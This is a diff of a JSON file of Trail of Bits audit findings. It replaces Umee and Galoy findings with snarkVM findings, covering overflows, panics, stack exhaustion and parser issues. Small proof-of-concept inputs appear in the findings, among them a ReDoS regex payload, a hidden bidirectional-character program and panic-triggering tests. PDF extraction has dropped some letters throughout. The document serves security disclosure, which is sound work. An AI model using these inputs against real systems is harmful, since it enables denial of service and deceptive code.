.hash(input); let mut output = vec! []; let num_rounds = ( xof_digest_length + 31 ) / 32 ; for node_offset in 0 ..num_rounds { Figure 3.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The nding is informational because the hash function is used only on the hash_to_curve routine, and never with an attacker-controlled digest length parameter. The currently used value is the size of the generator, which is not expected to reach values similar to u16::MAX . Exploit Scenario The Blake2Xs hash function is used with the maximum number of bytes, u16::MAX , to compare password hashes. Due to the vulnerability, any password will match the correct one since the hash output is always the empty array, allowing an attacker to gain access. Recommendations Short term, upcast the xof_digest_length variable to a larger type before the sum. This will prevent the overow while enforcing the u16::MAX bound on the requested digest length. 4. Blake2Xs implementations node o\u0000set denition di\u0000ers from specication Severity: Informational Diculty: High Type: Cryptography Finding ID: TOB-ALEOA-4 Target: console/algorithms/src/blake2xs/mod.rs", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "26. Insu\u0000cient validation of genesis parameters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "A few system parameters must be set correctly for the system to function properly. The system checks the parameter input against minimum and maximum values (not always correctly) but does not check the correctness of the parameters dependencies. Exploit Scenario When preparing a protocol upgrade, the Umee team accidentally introduces an invalid value into the conguration le. As a result, the upgrade is deployed with an invalid or unexpected parameter. Recommendations Short term, implement proper validation of congurable values to ensure that the following expected invariants hold: BaseBorrowRate <= KinkBorrowRate <= MaxBorrowRate LiquidationIncentive <= some maximum CompleteLiquidationThreshold > 0 (The third invariant is meant to prevent division by zero in the Interpolate method.)", + "title": "5. Compiling cast instructions can lead to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The output_types function of the cast instruction assumes that the number of record or interface elds equals the number of input types. // missing checks for (input_type, (_, entry_type)) in input_types.iter().skip( 2 ). zip_eq(record.entries() ) { Figure 5.1: Invocation of zip_eq on two iterators that dier in length ( cast.rs:401 ) Therefore, compiling a program with an unmatched cast instruction will cause a runtime panic. The program in gure 5.2 casts two registers into an interface type with only one eld: program aleotest.aleo; interface message: amount as u64; function test: input r0 as u64.private; cast r0 r0 into r1 as message; Figure 5.2: Program panics during compilation Figure 5.3 shows a program that will panic when compiling because it casts three registers into a record type with two elds: program aleotest.aleo; record token: owner as address.private; gates as u64.private; function test: input r0 as address.private; input r1 as u64.private; cast r0 r1 r1 into r2 as token.record; Figure 5.3: Program panics during compilation The following stack trace is printed in both cases: as core::iter::traits::iterator::Iterator>::next::h5c767bbe55881ac0 snarkvm_compiler::program::instruction::operation::cast::Cast::output_types::h3d1 251fbb81d620f snarkvm_compiler::process::stack::helpers::insert::>::check_instruction::h6bf69c769d8e877b snarkvm_compiler::process::stack::Stack::new::hb1c375f6e4331132 snarkvm_compiler::process::deploy::>::deploy::hd75a28b4fc14e19e snarkvm_fuzz::harness::fuzz_program::h131000d3e1900784 This bug was discovered through fuzzing with LibAFL . Figure 5.4: Stack trace Recommendations Short term, add a check to validate that the number of Cast arguments equals the number of record or interface elds. Long term, review all other uses of zip_eq and check the length of their iterators.", "labels": [ "Trail of Bits", "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "6. Displaying an Identier can cause a panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Identifier of a program uses Fields internally. It is possible to construct an Identifier from an arbitrary bits array. However, the implementation of the Display trait of Identifier expects that this arbitrary data is valid UTF-8. Creating an identier from a bytes array already checks whether the bytes are valid UTF-8. The following formatting function tries to create a UTF-8 string regardless of the bits of the eld. fn fmt (& self , f: & mut Formatter) -> fmt :: Result { // Convert the identifier to bits. let bits_le = self . 0. to_bits_le(); // Convert the bits to bytes. let bytes = bits_le .chunks( 8 ) .map(|byte| u8 ::from_bits_le(byte).map_err(|_| fmt::Error)) .collect::< Result < Vec < u8 >, _>>()?; // Parse the bytes as a UTF-8 string. let string = String ::from_utf8(bytes).map_err(|_| fmt::Error)? ; ... } Figure 6.1: Relevant code ( parse.rs:76 ) As a result, constructing an Identifier with invalid UTF-8 bit array will cause a runtime error when the Identifier is displayed. The following test shows how to construct such an Identifier . #[test] fn test_invalid_identifier () { let invalid: & [ u8 ] = &[ 112 , 76 , 113 , 165 , 54 , 175 , 250 , 182 , 196 , 85 , 111 , 26 , 71 , 35 , 81 , 194 , 56 , 50 , 216 , 176 , 126 , 15 ]; let bits: Vec < bool > = invalid.iter().flat_map(|n| [n & ( 1 << 7 ) != 0 , n & ( 1 << 6 ) != 0 , n & ( 1 << 5 ) != 0 , n & ( 1 << 4 ) != 0 , n & ( 1 << 3 ) != 0 , n & ( 1 << 2 ) != 0 , n & ( 1 << 1 ) != 0 , n & ( 1 << 0 ) != 0 ]).collect(); let name = Identifier::from_bits_le(&bits).unwrap(); let network = Identifier::from_str( \"aleo\" ).unwrap(); let id = ProgramID::::from((name, network)); println!( \"{:?}\" , id.to_string()); } // a Display implementation returned an error unexpectedly: Error // thread 'program::tests::test_invalid_identifier' panicked at 'a Display implementation returned an error unexpectedly: Error', library/core/src/result.rs:1055:23 4: ::to_string at /rustc/dc80ca78b6ec2b6bba02560470347433bcd0bb3c/library/alloc/src/string.rs:2489:9 5: snarkvm_compiler::program::tests::test_invalid_identifier at ./src/program/mod.rs:650:26 Figure 6.2: Test causing a panic The testnet3_add_fuzz_tests branch has a workaround that prevents nding this issue. Using the arbitrary crate, it is likely that non-UTF-8 bit-strings end up in identiers. We suggest xing this bug instead of using the workaround. This bug was discovered through fuzzing with LibAFL. Recommendations Short term, we suggest using a placeholder like unprintable identifier instead of returning a formatting error. Alternatively, a check for UTF-8 could be added in the Identifier::from_bits_le .", + "labels": [ + "Trail of Bits", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "31. Lack of prioritization of Peggo orchestrator messages ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Peggo orchestrator messages, like oracle messages ( TOB-UMEE-20 ), are not prioritized over other transactions for inclusion in a block. As a result, if the network is highly congested, orchestrator transactions may not be included in the earliest possible block. Although the Umee system could increase the fee charged for including a Peggo orchestrator message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35 , which returns a priority argument Reimplementing part of the Tendermint engine , as Terra Money did Using Substrates dispatch classes , which allow developers to mark transactions as normal , operational , or mandatory Exploit Scenario A user sends tokens from Ethereum to Umee by calling Gravity Bridges sendToCosmos function. When validators notice the transaction in the Ethereum logs, they send MsgSendToCosmosClaim messages to Umee. However, 34% of the messages are front-run by an attacker, eectively stopping Umee from acknowledging the token transfer. Recommendations Short term, use a custom CheckTx method to prioritize Peggo orchestrator messages. Long term, ensure that operations that aect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", + "title": "7. Build script causes compilation to rerun ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "Using the current working directory as a rerun condition causes unnecessary recompilations, as any change in cargos target directory will trigger a compilation. // Re-run upon any changes to the workspace. println!( \"cargo:rerun-if-changed=.\" ); Figure 7.1: Rerun condition in build.rs ( build.rs:57 ) The root build script also implements a check that all les include the proper license. However, the check is insucient to catch all cases where developers forget to include a license. Adding a new empty Rust le without modifying any other le will not make the check in the build.rs fail because the check is not re-executed. Recommendations Short term, remove the rerun condition and use the default Cargo behavior . By default cargo reruns the build.rs script if any Rust le in the source tree has changed. Long term, consider using a git commit hook to check for missing licenses at the top of les. An example of such a commit hook can be found here .", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Undetermined" ] }, { - "title": "32. Failure of a single broadcast Ethereum transaction causes a batch-wide failure ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Peggo orchestrator broadcasts Ethereum events as Cosmos messages and sends them in batches of 10 ( at least by default ). According to a code comment (gure 32.1), if the execution of a single message fails on the Umee side, all of the other messages in the batch will also be ignored. We set the severity of this nding to undetermined because it is unclear whether it is exploitable. // runTx processes a transaction within a given execution mode, encoded transaction // bytes, and the decoded transaction itself. All state transitions occur through // a cached Context depending on the mode provided. State only gets persisted // if all messages get executed successfully and the execution mode is DeliverTx. // Note, gas execution info is always returned. A reference to a Result is // returned if the tx does not run out of gas and if all the messages are valid // and execute successfully. An error is returned otherwise. func (app *BaseApp) runTx(mode runTxMode, txBytes [] byte , tx sdk.Tx) (gInfo sdk.GasInfo, result *sdk.Result, err error ) { Figure 32.1: cosmos-sdk/v0.45.1/baseapp/baseapp.go#L568-L575 Recommendations Short term, review the practice of ignoring an entire batch of Peggo-broadcast Ethereum events when the execution of one of them fails on the Umee side, and ensure that it does not create a denial-of-service risk. Alternatively, change the system such that it can identify any messages that will fail and exclude them from the batch. Long term, generate random messages corresponding to Ethereum events and use them in testing to check the systems handling of failed messages.", + "title": "8. Invisible codepoints are supported ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The current parser allows any Unicode character in strings or comments, which can include invisible bidirectional override characters . Using such characters can lead to dierences between the code reviewed in a pull request and the compiled code. Figure 8.1 shows such a program: since r2 and r3 contain the hash of the same string, r4 is true , and r5 equals r1 , the output token has the amount eld set to the second input. However, the compiled program always returns a token with a zero amount . // Program comparing aleo with aleo string program aleotest.aleo; record token: owner as address.private; gates as u64.private; amount as u64.private; function mint: input r0 as address.private; input r1 as u64.private; hash.psd2 \"aleo\" into r2; \" into r3; hash.psd2 \"aleo // Same string again is.eq r2 r3 into r4; // r4 is true because r2 == r3 ternary r4 r1 0u64 into r5; // r5 is r1 because r4 is true cast r0 0u64 r5 into r6 as token.record; output r6 as token.record; Figure 8.1: Aleo program that evaluates unexpectedly By default, VSCode shows the Unicode characters (gure 8.2). Google Docs and GitHub display the source code as in gure 8.1. Figure 8.2: The actual source This nding is inspired by CVE-2021-42574 . Recommendations Short term, reject the following code points: U+202A, U+202B, U+202C, U+202D, U+202E, U+2066, U+2067, U+2068, U+2069. This list might not be exhaustive. Therefore, consider disabling all non-ASCII characters in the Aleo language. In the future, consider introducing escape sequences so users can still use bidirectional code points if there is a legitimate use case.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Medium" ] }, { - "title": "1. Insecure download process for the yq tool ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Dockerle uses the Wget utility to download the yq tool but does not verify the le it has downloaded by its checksum or signature. Without verication, an archive that has been corrupted or modied by a malicious third party may not be detected. Figures 1.1 and 1.2 show cases in which a tool is downloaded without verication of its checksum. 6 RUN wget https://github.com/mikefarah/yq /releases/download/v4.17.2/yq_linux_386.tar.gz -O - | \\ 7 tar xz && mv yq_linux_386 /usr/bin/yq Figure 1.1: The Dockerle downloads and unarchives the yq tool. ( ci/image/Dockerfile#67 ) 41 wget https://github.com/bodymindarts/cepler /releases/download/v ${ cepler_version } /cepler-x 86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 42 && tar -zxvf cepler-x86_64-unknown-linux-musl- ${ cepler_version } .tar.gz \\ 43 && mv cepler-x86_64-unknown-linux-musl- ${ cepler_version } /cepler /usr/local/bin \\ 44 && chmod +x /usr/local/bin/cepler \\ 45 && rm -rf ./cepler-* Figure 1.2: The bastion-startup script downloads and unarchives the cepler tool. ( modules/inception/gcp/bastion-startup.tmpl#4145 ) Exploit Scenario An attacker gains access to the GitHub repository from which yq is downloaded. The attacker then modies the binary to create a reverse shell upon yq s startup. When a user runs the Dockerle, the attacker gains access to the users container. Recommendations Short term, have the Dockerle and other scripts in the solution verify each le they download by its checksum . Long term, implement checks to ensure the integrity of all third-party components used in the solution and periodically check that all components are downloaded from encrypted URLs.", + "title": "9. Merkle tree constructor panics with large leaf array ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Merkle tree constructor panics or returns a malformed Merkle tree when the provided leaves array has more than usize::MAX/2 elements. To build a Merkle tree, the constructor receives the necessary array of leaves. Being a binary tree, the nal total number of nodes is computed using the smallest power of two above the number of leaves given: pub fn new (leaf_hasher: & LH , path_hasher: & PH , leaves: & [LH::Leaf]) -> Result < Self > { // Ensure the Merkle tree depth is greater than 0. ensure!(DEPTH > 0 , \"Merkle tree depth must be greater than 0\" ); // Ensure the Merkle tree depth is less than or equal to 64. ensure!(DEPTH <= 64 u8 , \"Merkle tree depth must be less than or equal to 64\" ); // Compute the maximum number of leaves. let max_leaves = leaves.len().next_power_of_two() ; // Compute the number of nodes. let num_nodes = max_leaves - 1 ; Figure 9.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The next_power_of_two function will panic in debug mode, and return 0 in release mode if the number is larger than (1 << (N-1)) . For the usize type, on 64-bit machines, the function returns 0 for numbers above 2 63 . On 32-bit machines, the necessary number of leaves would be at least 1+2 31 . Exploit Scenario An attacker triggers a call to the Merkle tree constructor with 1+2 31 leaves, causing the 32-bit machine to abort due to a runtime error or to return a malformed Merkle tree. Recommendations Short term, use checked_next_power_of_two and check for success. Check all other uses of the next_power_of_two for similar issues.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, { - "title": "2. Use of unencrypted HTTP scheme ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy ipfetcher module uses the unencrypted HTTP scheme (gure 2.1). As a result, an attacker in the same network as the host invoking the code in gure 2.1 could intercept and modify both the request and ipfetcher s response to it, potentially accessing sensitive information. 8 9 const { data } = await axios.get( ` http ://proxycheck.io/v2/ ${ ip } ?key= ${ PROXY_CHECK_APIKEY } &vpn=1&asn=1` , 10 ) Figure 2.1: src/services/ipfetcher/index.ts#810 Exploit Scenario Eve gains access to Alices network and obtains Alices PROXY_CHECK_APIKEY by observing the unencrypted network trac. Recommendations Short term, change the URL scheme used in the ipfetcher service to HTTPS. Long term, use tools such as WebStorm code inspections to nd other uses of unencrypted URLs.", + "title": "10. Downcast possibly truncates value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "To validate the console's Ciphertext eld vector length against a u32 constant, the program downcasts the length from usize to u32 . This could cause a value truncation and a successful write when an error should occur. Then, the program downcasts the value to a u16 , not checking rst if this is safe without truncation. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of field elements does not exceed the maximum allowed size. if self . 0. len() as u32 > N::MAX_DATA_SIZE_IN_FIELDS { return Err (error( \"Ciphertext is too large to encode in field elements.\" )); } // Write the number of ciphertext field elements. ( self . 0. len() as u16 ).write_le(& mut writer)?; // Write the ciphertext field elements. self . 0. write_le(& mut writer) } } Figure 10.1: console/program/src/data/ciphertext/bytes.rs#L36-L49 Figure 10.2 shows another instance where the value is downcasted to u16 without checking if this is safe: // Ensure the number of field elements does not exceed the maximum allowed size. match num_fields <= N::MAX_DATA_SIZE_IN_FIELDS as usize { // Return the number of field elements. true => Ok ( num_fields as u16 ), Figure 10.2: console/program/src/data/ciphertext/size_in_fields.rs#L21-L30 A similar downcast is present in the Plaintext size_in_fields function . Currently, this downcast causes no issue because the N::MAX_DATA_SIZE_IN_FIELDS constant is less than u16::MAX . However, if this constant were changed, truncating downcasts could occur. Recommendations Short term, upcast N::MAX_DATA_SIZE_IN_FIELDS in Ciphertext::write_le to usize instead of downcasting the vector length, and ensure that the downcasts to u16 are safe.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "3. Lack of expiration and revocation mechanism for JWTs ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy system uses JSON web tokens (JWTs) for authentication. A user obtains a new JWT by calling the userLogin GraphQL mutation. Once a token has been signed, it is valid forever; the platform does not set an expiration time for tokens and cannot revoke them. 7 export const createToken = ({ 8 uid, 9 network, 10 }: { 11 uid: UserId 12 network: BtcNetwork 13 }): JwtToken => { 14 return jwt.sign({ uid, network }, JWT_SECRET, { // (...) 25 algorithm: \"HS256\" , 26 }) as JwtToken 27 } Figure 3.1: The creation of a JWT ( src/services/jwt.ts#727 ) Exploit Scenario An attacker obtains a users JWT and gains persistent access to the system. The attacker then engages in destructive behavior. The victim eventually notices the behavior but does not have a way to stop it. Recommendations Short term, consider setting an expiration time for JWTs, and implement a mechanism for revoking tokens. That way, if a JWT is leaked, an attacker will not gain persistent access to the system.", + "title": "11. Plaintext::from_bits_* functions assume array has elements ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The from_bits_le function assumes that the provided array is not empty, immediately indexing the rst and second positions without a length check: /// Initializes a new plaintext from a list of little-endian bits *without* trailing zeros. fn from_bits_le (bits_le: & [ bool ]) -> Result < Self > { let mut counter = 0 ; let variant = [bits_le[counter], bits_le[counter + 1 ]]; counter += 2 ; Figure 11.1: circuit/program/src/data/plaintext/from_bits.rs#L22-L28 A similar pattern is present on the from_bits_be function on both the Circuit and Console implementations of Plaintext . Instead, the function should rst check if the array is empty before accessing elements, or documentation should be added so that the function caller enforces this. Recommendations Short term, check if the array is empty before accessing elements, or add documentation so that the function caller enforces this.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "4. Use of insecure function to generate phone codes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application generates a verication code by using the JavaScript function Math.random() , which is not a cryptographically secure pseudorandom number generator (CSPRNG) . const randomIntFromInterval = (min, max) => Math .floor( Math .random() * (max - min + 1 ) + min) 10 11 12 // (...) 82 83 84 85 86 87 const code = String ( randomIntFromInterval( 100000 , 999999 ) ) as PhoneCode const galoyInstanceName = getGaloyInstanceName() const body = ` ${ code } is your verification code for ${ galoyInstanceName } ` const result = await PhoneCodesRepository().persistNew({ 88 phone: phoneNumberValid , 89 code, 90 }) 91 92 93 94 95 96 } if (result instanceof Error ) return result const sendTextArguments = { body, to: phoneNumberValid , logger } return TwilioClient().sendText(sendTextArguments) Figure 4.1: src/app/users/request-phone-code.ts#1096 Exploit Scenario An attacker repeatedly generates verication codes and analyzes the values and the order of their generation. The attacker attempts to deduce the pseudorandom number generator's internal state. If successful, the attacker can then perform an oine calculation to predict future verication codes. Recommendations Short term, replace Math.random() with a CSPRNG. Long term, always use a CSPRNG to generate random values for cryptographic operations.", + "title": "12. Arbitrarily deep recursion causes stack exhaustion ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase has recursive functions that operate on arbitrarily deep structures. This causes a runtime error as the programs stack is exhausted with a very large number of recursive calls. The Plaintext parser allows an arbitrarily deep interface value such as {bar: {bar: {bar: {... bar: true}}} . Since the formatting function is recursive, a suciently deep interface will exhaust the stack on the fmt_internal recursion. We conrmed this nding with a 2880-level nested interface. Parsing the interface with Plaintext::from_str succeeds, but printing the result causes stack exhaustion: #[test] fn test_parse_interface3 () -> Result <()> { let plain = Plaintext::::from_str( /* too long to display */ )?; println! ( \"Found: {plain}\\n\" ); Ok (()) } // running 1 test // thread 'data::plaintext::parse::tests::test_deep_interface' has overflowed its stack // fatal runtime error: stack overflow // error: test failed, to rerun pass '-p snarkvm-console-program --lib' Figure 12.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The same issue is present on the record and record entry formatting routines. The Record::find function is also recursive, and a suciently large argument array could also lead to stack exhaustion. However, we did not conrm this with a test. Exploit Scenario An attacker provides a program with a 2880-level deep interface, which causes a runtime error if the result is printed. Recommendations Short term, add a maximum depth to the supported data structures. Alternatively, implement an iterative algorithm for creating the displayed structure.", "labels": [ "Trail of Bits", "Severity: Low", @@ -3832,69 +6540,69 @@ ] }, { - "title": "5. Redundant basic authentication method ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application implements a basic authentication method (gure 5.1) that is redundant because the apiKey is not being used. Superuous authentication methods create new attack vectors and should be removed from the codebase. 1 2 3 import express from \"express\" const formatError = new Error ( \"Format is Authorization: Basic \" ) 4 5 export default async function ( 6 req: express.Request , 7 _res: express.Response , 8 next: express.NextFunction , 9 ) { 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 const authorization = req.headers[ \"authorization\" ] if (!authorization) return next() const parts = authorization.split( \" \" ) if (parts.length !== 2 ) return next() const scheme = parts[ 0 ] if (! /Basic/i .test(scheme)) return next() const credentials = Buffer. from (parts[ 1 ], \"base64\" ).toString().split( \":\" ) if (credentials.length !== 2 ) return next(formatError) const [apiKey, apiSecret] = credentials if (!apiKey || !apiSecret) return next(formatError) 25 req[ \"apiKey\" ] = apiKey 26 req[ \"apiSecret\" ] = apiSecret 27 next() 28 } Figure 5.1: The basic authentication method implementation ( src/servers/middlewares/api-key-auth.ts#128 ) Recommendations Short term, remove the apiKey -related code. Long term, review and clearly document the Galoy authentication methods.", + "title": "13. Inconsistent pair parsing ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase has several implementations to parse pairs from strings of the form key: value depending on the expected type of value . However, these parsers also handle whitespaces around the colon dierently. As an example, gure 13.1 shows a parser that allows whitespaces before the colon, while gure 13.2 shows one that does not: fn parse_pair (string: &str ) -> ParserResult <(Identifier, Plaintext)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the whitespace from the string. let (string, _) = Sanitizer::parse_whitespaces(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the plaintext from the string. let (string, plaintext) = Plaintext::parse(string)?; Figure 13.1: console/program/src/data/plaintext/parse.rs#L23-L34 fn parse_pair (string: &str ) -> ParserResult <(Identifier, Entry>)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the entry from the string. let (string, entry) = Entry::parse(string)?; Figure 13.2: console/program/src/data/record/parse_plaintext.rs#L23-L33 We also found that whitespaces before the comma symbol are not allowed: let (string, owner) = alt(( map(pair( Address::parse, tag( \".public\" ) ), |(owner, _)| Owner::Public(owner)), map(pair( Address::parse, tag( \".private\" ) ), |(owner, _)| { Owner::Private(Plaintext::from(Literal::Address(owner))) }), ))(string)?; // Parse the \",\" from the string. let (string, _) = tag( \",\" )(string)?; Figure 13.3: console/program/src/data/record/parse_plaintext.rs#L52-L60 Recommendations Short term, handle whitespace around marker tags (such as colon, commas, and brackets) uniformly. Consider implementing a generic pair parser that receives the expected value type parser instead of reimplementing it for each type. 14. Signature veries with di\u0000erent messages Severity: Informational Diculty: Low Type: Cryptography Finding ID: TOB-ALEOA-14 Target: console/account/src/signature/verify.rs", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "6. GraphQL queries may facilitate CSRF attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy applications /graphql endpoint handles queries sent via GET requests. It is impossible to pass state-changing mutations or subscriptions in GET requests, and authorized queries need the Authorization: Bearer header. However, if a state-changing GraphQL operation were mislabeled as a query (typically a non-state-changing request), the endpoint would be vulnerable to cross-site request forgery (CSRF) attacks. Exploit Scenario An attacker creates a malicious website with JavaScript code that sends requests to the /graphql endpoint (gure 6.1). When a user visits the website, the JavaScript code is executed in the users browser, changing the servers state.

Figure 6.1: In this proof-of-concept CSRF attack, the malicious website sends a request (the btcPriceList query) when the victim clicks Submit request. Recommendations Short term, disallow the use of the GET method to send queries, or enhance the CSRF protections for GET requests. Long term, identify all state-changing endpoints and ensure that they are protected by an authentication or anti-CSRF mechanism. Then implement tests for those endpoints. References Cross-Origin Resource Sharing, Mozilla documentation Cross-Site Request Forgery Prevention, OWASP Cheat Sheet Series", + "title": "15. Unchecked output length during ToFields conversion ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "When converting dierent types to vectors of Field elements, the codebase has checks to validate that the resulting Field vector has fewer than MAX_DATA_SIZE_IN_FIELDS elements. However, the StringType::to_fields function is missing this validation: impl ToFields for StringType { type Field = Field; /// Casts a string into a list of base fields. fn to_fields (& self ) -> Vec < Self ::Field> { // Convert the string bytes into bits, then chunk them into lists of size // `E::BaseField::size_in_data_bits()` and recover the base field element for each chunk. // (For advanced users: Chunk into CAPACITY bits and create a linear combination per chunk.) self .to_bits_le().chunks(E::BaseField::size_in_data_bits()).map(Field::from_bits_le) .collect() } } Figure 15.1: circuit/types/string/src/helpers/to_fields.rs#L20-L30 We also remark that other conversion functions, such as from_bits and to_bits , do not constraint the input or output length. Recommendations Short term, add checks to validate the Field vector length for the StringType::to_fields function. Determine if other output functions (e.g., to_bits ) should also enforce length constraints.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "7. Potential ReDoS risk ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The caseInsensitiveRegex function takes an input: string parameter and uses it to create a new RegExp object (gure 7.1). Users cannot currently control the input parameter (the regular expression) or the string; however, if users gain that ability as the code is developed, it may enable them to cause a regular expression denial of service (ReDoS) . 13 14 export const caseInsensitiveRegex = (input: string ) => { return new RegExp ( `^ ${ input } $` , \"i\" ) 15 } Figure 7.1: src/services/mongoose/users.ts#1315 37 const findByUsername = async ( 38 username: Username , 39 ): Promise => { 40 41 try { const result = await User.findOne( 42 { username: caseInsensitiveRegex (username) }, Figure 7.2: src/services/mongoose/accounts.ts#3742 Exploit Scenario An attacker registers an account with a specially crafted username (line 2, gure 7.3), which forms part of a regex. The attacker then nds a way to pass the malicious regex (line 1, gure 7.3) to the findByUsername function, causing a denial of service on a victims machine. 1 2 let test = caseInsensitiveRegex( \"(.*){1,32000}[bc]\" ) let s = \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!\" 3 s.match(test) Figure 7.3: A proof of concept for the ReDoS vulnerability Recommendations Short term, ensure that input passed to the caseInsensitiveRegex function is properly validated and sanitized.", + "title": "16. Potential panic on ensure_console_and_circuit_registers_match ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The codebase implements the ensure_console_and_circuit_registers_match function, which validates that the values on the console and circuit registers match. The function uses zip_eq to iterate over the two register arrays, but does not check if these arrays have the same length, leading to a runtime error when they do not. pub fn ensure_console_and_circuit_registers_match (& self ) -> Result <()> { use circuit::Eject; for ((console_index, console_register), (circuit_index, circuit_register)) in self .console_registers.iter(). zip_eq (& self .circuit_registers) Figure 16.1: vm/compiler/src/process/registers/mod.rs This runtime error is currently not reachable since the ensure_console_and_circuit_registers_match function is called only in CallStack::Execute mode, and the number of stored registers match in this case: // Store the inputs. function.inputs().iter().map(|i| i.register()).zip_eq(request.inputs()).try_for_each(|(register, input)| { // If the circuit is in execute mode, then store the console input. if let CallStack::Execute(..) = registers.call_stack() { // Assign the console input to the register. registers.store( self , register, input.eject_value())?; } // Assign the circuit input to the register. registers.store_circuit( self , register, input.clone()) })?; Figure 16.2: vm/compiler/src/process/stack/execute.rs Recommendations Short term, add a check to validate that the number of circuit and console registers match on the ensure_console_and_circuit_registers_match function.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { - "title": "8. Use of MD5 to generate unique GeeTest identiers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The Galoy application uses MD5 hashing to generate a unique identier during GeeTest service registration. MD5 is an insecure hash function and should never be used in a security-relevant context. 33 const register = async (): Promise => { 34 35 36 37 try { const gtLib = new GeetestLib(config.id, config.key) const digestmod = \"md5\" const params = { 38 digestmod, 39 client_type: \"native\" , 40 } 41 42 43 const bypasscache = await getBypassStatus() // not a cache let result if (bypasscache === \"success\" ) { 44 result = await gtLib.register(digestmod, params) Figure 8.1: src/services/geetest.ts#3344 Recommendations Short term, change the hash function used in the register function to a stronger algorithm that will not cause collisions, such as SHA-256. Long term, document all cryptographic algorithms used in the system, implement a policy governing their use, and create a plan for when and how to deprecate them.", + "title": "17. Reserved keyword list is missing owner ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The compiler veries that identiers are not part of a list of reserved keywords. However, the list of keywords is missing the owner keyword. This contrasts with the other record eld, gates , which is a reserved keyword. // Record \"record\" , \"gates\" , // Program Figure 17.1: vm/compiler/src/program/mod.rs Recommendations Short term, add owner to the list of reserved keywords.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "9. Reliance on SMS-based OTPs for authentication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Galoys authentication process is heavily reliant on the delivery of one-time passwords (OTPs) over SMS. This authentication method contravenes best practices and should not be used in applications that handle nancial transactions or other sensitive operations. SMS-based OTP leaves users vulnerable to multiple attacks and is considered an unsafe authentication method. Several of the most common and eective attack scenarios are described below. Text messages received by a mobile device can be intercepted by rogue applications on the device. Many users blindly authorize untrusted third-party applications to access their mobile phones SMS databases; this means that a 